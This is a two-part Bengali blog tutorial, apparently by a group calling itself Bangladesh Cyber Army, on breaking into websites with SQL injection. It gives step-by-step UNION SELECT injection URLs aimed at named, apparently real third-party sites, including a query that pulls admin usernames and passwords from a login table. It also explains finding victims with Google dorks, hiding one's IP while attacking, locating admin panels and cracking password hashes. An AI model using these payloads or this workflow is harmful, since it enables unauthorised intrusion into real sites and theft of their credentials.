বাংলায় হ্যাকিং
ওয়েব সাইট হ্যাক করুন SQL ইঞ্জেকশন দিয়ে (সাইট হ্যাক হবে চোখের পলকে) বাংলায় হ্যাকিং-পর্বঃ ১
ওয়েব সাইট হ্যাক করুন SQL ইঞ্জেকশন দিয়ে (সাইট হ্যাক হবে চোখের পলকে) বাংলায় হ্যাকিং-পর্বঃ ২
SQL
SQL Inj3cti0n কি ?
সহজ ভাষায় বলতে গেলে SQL Inj3cti0n হলো এমন একটি code inj3cti0n কৌশল যা কোনো সাইটের ডাটাবেজের সিকিউরিটি কে ভেঙ্গে তা থেকে ইনফরমেশন বের করতে পারে।
যে কোনো সাইটে SQL Inj3cti0n করা যাবে ?
না। SQL Inj3cti0n তখনি কাজ করবে যখন কোনো সাইটে SQL error থাকবে।
কোনো সাইটে SQL error আছে কি নেই তা বুজবো কিভাবে ?
যেই সব সাইটে id=value থাকে ধরুন
http://www.site.com/news.php?id=5
সাধারণত এই সব সাইটে SQL error থাকে। কোনো সাইটে SQL error এভাবেই দেখাবে না, error দেখার জন্য আপনাকে url এর শেষে একটি '(string) দিতে হবে।
উদাহরণঃ http://www.bayviewhotelni.com/news.php?id=3 এটি হচ্ছে আসল লিঙ্ক, এই লিঙ্কে যখন আপনি ব্রাউজারে লোড করবেন তখন কোনো error আসবে না। যখন আপনি url এর শেষে একটি '(string) দিবেন তখন ঠিকই error আসবে।
http://www.bayviewhotelni.com/news.php?id=3'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1
অথবা অনেক সময় দেখতে পারবেন যখন ' বসিয়েছেন তখন সাইটে যদি কোনো ছবি/ডাটা মিস করে তাহলে ও অই সাইটে SQL error আছে।
অর্থাৎ বোঝা গেলো এই সাইটে SQL error আছে। তাই আমরা এই সাইটটি কে SQL Inj3cti0n করেন হ্যাক করতে পারবো।
কিভাবে SQL inj3ction করবো কোনো সাইটকে ?
প্রথমে আমরা মজিলাতে একটি এডন ইন্সটল করবো যার নাম হচ্ছে HaCkBar. এই এডনটি ব্যবহার করলে কিছু কমান্ড দিতে সহজ হয়।
ডাউনলোড করে নিন এখান থেকে : https://addons.mozilla.org/en-us/firefox/addon/hackbar/
ইন্সটল করার পরেই দেখবেন আপনার ব্রাউজারে এডনটি দেখা যাচ্ছে।
সাইটের মোট কলাম নাম্বার বের করার নিয়ম :-
আপনি যখন SQL error কোনো সাইটকে SQL Inj3cti0n করতে যাবেন তখন আপনার প্রথম কাজ হবে সাইটের ডাটাবেজে মোট কয়টি কলাম আছে তা বের করা। আর বের করার পদ্ধতি হলো order by কমান্ড।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 1--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 2--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 3--
এভাবে যেতে থাকবেন যতক্ষণ পর্যন্ত কোনো Err0r না আসে।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 11--
দিলে কিছু লিখা অদৃশ্য হয়ে যায় অর্থাৎ এই সাইটটিতে মোট 10 টি কলাম আছে।
Vulnerable কলাম বের করার নিয়ম :-
এখন আমাদের দেখতে হবে এই সাইটের ১০ টি কলামের মধ্যে কতটি কলাম vulnerable. যেই সব কলাম vulnerable সেই সব কলাম থেকেই ডাটাবেজ এর ইনফরমেশন বের করা যাবে। আমরা Union Select কমান্ড ব্যবহার করে সাইটের vulnerable কলাম গুলা বের করবো।
প্রথমে union select তারপরে যে কইটি কলাম সে কলাম গুলা ঠিক এভাবে বসাতে হবে। আর id=value er আগে একটি - চিহ্ন বসাতে হবে যেমন- http://www.sparkleappealdorset.org/supporter.php?id=-7
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,2,3,4,5,6,7,8,9,10--
ডাটাবেজ ভার্শন বের করার নিয়ম:-
যে কোনো একটি vulnerable কলামে আমরা SQL কমান্ড বসাবো যাতে আমরা ডাটাবেজের ইনফরমেশন বের করতে পারি। কোনো সাইটের ডাটাবেজ এর ভার্শন যদি 4 হয় তাহলে তা ম্যানুয়ালি inj3ct করা যাবে না। তখন টুলস ব্যবহার করতে হবে like havij । আর যদি 5 হয় তাহলে আমরা ম্যানুয়ালি inj3ct করতে পারবো।
এই সাইটটিতে অনেক গুলা vulnerable কলাম আমাদের যে কোনো একটিকে বাছাই করে নিতে হবে।
ধরি আমরা ২ নাম্বার কলাম থেকে ডাটাবেজ ভার্শন বের করবো।
তাহলে syntax টি হবে
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,version(),3,4,5,6,7,8,9,10--
vulnerable কলামে version() রিপ্লেস করলেই ডাটাবেজের ভার্শন চলে আসবে।
ডাটাবেজ থেকে টেবিল বের করার নিয়ম :-
vulnerable কলামের জাগায় group_concat(table_name) এবং এক দম শেষ কলামের পরে from information_schema.tables where table_schema=database()--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
যে টেবিল গুলো আমরা পেলাম তা হলো event,galleryImage,login_admin,supporter
এখানে এডমিন টেবিল হচ্ছে login_admin, এই টেবিল থেকে আমরা এডমিনের ইউসার এবং পাসওয়ার্ড বের করবো।
এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-
vulnerable কলামের জাগায় group_concat(column_name) এবং এক দম শেষ কলামের পরে from information_schema.columns where table_name=0xএডমিন টেবিল নামের হেক্স কোড--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--
এডমিন ইউসার এবং পাসওয়ার্ড বের করার নিয়ম :-
vulnerable কলামের জাগায় concat{যে কলাম গুলো পেয়েছেন সে গুলো(সব গুলো কলাম নয় সুধু মাত্র ইউসার এবং পাসওয়ার্ড এর কলাম)} এবং এক দম শেষ কলামের পরে কোন টেবিল থেকে এই কলাম পেয়েছেন সেই টেবিলের নাম।
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,concat(uid,0x3a,pwd),3,4,5,6,7,8,9,10 from login_admin--
বাস পেয়ে গেলেন সাইটের এডমিন পাসওয়ার্ড । এখন পুরো সাইটি আপনার হাতে যা খুশি তাই করুন। তবে মারাত্মক কোনো ক্ষতি না করাই ভালো। সহজেই হয়ে গেলেন একজন ওয়েব হ্যাকার :P
কিছু কথাঃ এই টপিকটা সহজভাবে বোঝানোর চেস্টা করেছি তাই ভাল লাগলে অবশ্যই ধন্যবাদ জানাবেন xD
বিঃদ্রঃ এই পোস্টটির কপিরাইট সম্পূর্ণ সংরক্ষিত এবং বাংলাদেশ সাইবার আর্মি এর অনুমতি ছাড়া আর কোথাও এটা লিখা/পোস্ট করা যাবে না।
ওয়েব সাইট হ্যাক করুন SQL ইঞ্জেকশন দিয়ে (সাইট হ্যাক হবে চোখের পলকে) বাংলায় হ্যাকিং-পর্বঃ ২
এটি 2 পর্বের বাংলায় হ্যাকিং চেইন টিউনের 2 তম পর্ব
বাংলায় হ্যাকিং
ওয়েব সাইট হ্যাক করুন SQL ইঞ্জেকশন দিয়ে (সাইট হ্যাক হবে চোখের পলকে) বাংলায় হ্যাকিং-পর্বঃ ১
ওয়েব সাইট হ্যাক করুন SQL ইঞ্জেকশন দিয়ে (সাইট হ্যাক হবে চোখের পলকে) বাংলায় হ্যাকিং-পর্বঃ ২
Join Bangladesh Cyber Army in FaceBook
ওয়েব সাইট হ্যাক করুন SQL ইঞ্জেকশন দিয়ে (সাইট হ্যাক হবে চোখের পলকে) বাংলায় হ্যাকিং-পর্বঃ ১
প্রথম পর্ব অনেকেই পছন্দ করেছেন এবং চেস্টা করেছেন তাই আপনাদেরকে অশেষ ধন্যবাদ ।
এই পর্বে যা থাকছে :
১।যেভাবে Vulnerable সাইট বের করতে হয় :
২। নিরাপদ ভাবে সাইটকে inj3ct করার নিয়ম :
৩। যেভাবে এডমিন প্যানেল বের করতে হয় :
৪। Hash ক্রাক করার নিয়ম :
Vulnerable সাইট বেরার করার নিয়ম :
vulnerable সাইট বের করার জন্য সাধারণত google dork ব্যবহার করা হয়। এখানে কিছু dork দেওয়া হলো।
http://pastebin.com/JKbYm05r
অনেকেই হয়তো এই dork গুলো নিয়ে google এ সার্চ মারবেন তারপরে url এর শেষে ' দিবেন তারপরে দেখবেন Error আসে কিনা। অনেক কষ্ট তাই না ?
আমি একটি লিঙ্ক দিচ্ছি যা সহজেই বলে দিবে সাইটটি SQL Vulnerable কিনা। প্রথমে এই http://sharp-soft.ir যান তারপরে আপনার কাঙ্ক্ষিত dork টি বসান তারপরে সার্চ এ ক্লিক করুন।
এই গুলা সব public dork অর্থাৎ প্রতিদিন লক্ষ লক্ষ মানুষ এই dork ব্যবহার করে সাইট হ্যাক করছে। আমি বলবো আপনি আপনার নিজের dork ব্যবহার করুন যা public এ নেই। public dork ব্যবহার করলে দেখা যাবে যে আপনি এত কস্ট করে একটি ওয়েবসাইট হ্যাক করলেন অথচ এডমিন প্যানেল এ গিয়ে দেখলেন আপনার আগে আরেকজন হ্যাক করে চলে গেছে তখন নিশ্চয় আপনার মন খারাপ হওয়ার কথা। এখন হয়তো আপনি প্রশ্ন করবেন ভাই আমি তো একদম কাচা কিভাবে dork বানাবো ?
আমি বলছি কিভাবে বানাবেন। আপনি যেহেতু এই পোস্টটি পড়ছেন অবশ্যই আপনি কম্পিউটার এর সামনে। এখন আপনার রুমের চারপারে তাকান দেখেন কি আছে, আপনার পাশে নিশ্চয় আপনার মোবাইল রয়েছে, তাহলে বানিয়ে ফেলুন আপনার dork
inurl:mobile.php?id=
আপনি মাউস দিয়ে সব কিছু ক্লিক করছেন বানিয়ে ফেলুন মাউসের dork
inurl:mouse.php?id=
এভাবে আপনার চিন্তা ধারা দিয়ে চেস্টা করতে থাকুন অবশ্যই ভালো dork বানাতে পারবেন। আমার মনে হয় dork বানানোর এর থেকে সহজ উপায় আর নেই :P
নিরাপদ ভাবে সাইটকে inj3ct করার নিয়ম :
একটা জিনিস লক্ষ করে দেখলাম যে অনেকেই সাইট হ্যাক করে তার রিয়াল আইপি দিয়েই এডমিন প্যানেল এ ঢুকে পরে । এতে আপনার অনেক ক্ষতি হওয়ার সম্ভাবনা রয়েছে। তাই সবসময় আপনার আইপি চেঞ্জ করে তারপরে সাইট হ্যাক করবেন।
আইপি চেঞ্জ করার জন্য আপনি প্রক্সি অথবা vpn(virtual private network) ব্যবহার করতে পারেন ।
যেমন :
proxy ---> http://www.hidemyass.com
vpn------> cyberghost Vpn
সাইটের এডমিন প্যানেল বের করার নিয়ম :
যখন আপনি কোনো সাইটকে ইঞ্জেক্ট করে এডমিন এবং পাসওয়ার্ড বের করবেন তখন আপনার দরকার এডমিন প্যানেল । এডমিন প্যানেল বের করার জন্য আমি কিছু সাইট দিচ্ছি যা যা স্কান করে বলে দিবে এডমিন প্যানেল এর সঠিক ঠিকানা।
http://sc0rpion.ir/af/
আরো কিছু সাইট আছে কিন্তু সাইট গুলি আপাতত বন্ধ আছে।
havij দিয়ে আপনি এডমিন প্যানেল খুজে বের করতে পারবেন। প্রথমে havij ওপেন করুন তারপরে Find Admin এ ক্লিক করুন। তারপরে আপনার কাঙ্ক্ষিত সাইটটি বসান।
এই সব স্কেনার যখন এডমিন প্যানেল খুজতে ব্যর্থ হবে তখন আমরা site crawler ব্যবহার করবো। এই কাজটি সম্পন্ন করার জন্য আমরা Acunetix Web Vulnerability Scanner ব্যবহার করবো।
ডাউনলোড করুন এই লিঙ্ক থেকে :
http://www.acunetix.com/vulnerability-scanner/vulnerabilityscanner.exe
প্রথমে আপনার পিসিতে ইন্সটল করুন। তারপরে এটিকে রান করুন।
এমনো অনেক সাইট আছে যার এডমিন প্যানেল site crawlier দিয়েও পাওয়া যায় না। তখন আমরা আরেকটি মেথড ব্যবহার করতে পারি তাহলো
robots.txt আমরা robots.txt রিড করে কোনো সাইটের এডমিন প্যানেল বের করতে পারবো। robots.txt এর কাজ হচ্ছে site crawler এবং সার্চ ইঞ্জিন বট থেকে এডমিন প্যানেল কে লুকানো ।
robots.txt ব্যবহার করবেন এভাবে
http://www.apnarsite.com/robots.txt
এভাবে ওপেন করলে ঠিক এরকম কিছু পাবেন
এতেও যদি এডমিন প্যানেল না পান তাহলে আমার মতে লাস্ট চেস্টা হচ্ছে আপনি যেই সাইটটিকে SQL Inj3cT করেছেন। অই সাইটের এডমিন টেবিলকে Replace korun, ধরুন আপনি tbl_admin টেবিল থেকে কোনো সাইটের এডমিন ইউজার এবং পাসওয়ার্ড বের করেছেন। তাহলে বসাবেন ঠিক এভাবে
http://www.hackedsite.com/tbl_admin
Hash ক্রাক করার নিয়ম :
বেশির ভাগ সাইটে এডমিন পাসওয়ার্ড ডাটাবেজ এ hash রুপে থাকে। hash অনেক ধরনের যেমন : MD5,MD4,SHA1
আমি এখানে কিছু সাইটের লিস্ট দিয়ে দিচ্ছি যেখান থেকে hash ক্রাক করতে পারবেন। তবে এমনও কিছু hash আছে যা এই সব সাইট গুলো ক্রাক করতে পারে না।
http://pastebin.com/mdpUpdSB
এই পর্ব এখানেই শেষ করছি পরের পর্বে থাকবে কিছু এডবান্স লেভেল এর SQL inj3cti0n method xD তাই পাশে থাকুন ।
কিছু কথা : অনেকেই havij দিয়ে সাইট হ্যাক করে থাকে আমি তাদের জন্য বলবো havij দিয়ে হ্যাক করলে আপনি কিছুই বুজবেন না কিভাবে কি হচ্ছে । ম্যানুয়ালি করার চেস্টা করুন than u will know how things are work xD
কোন মন্তব্য নেই:
একটি মন্তব্য পোস্ট করুন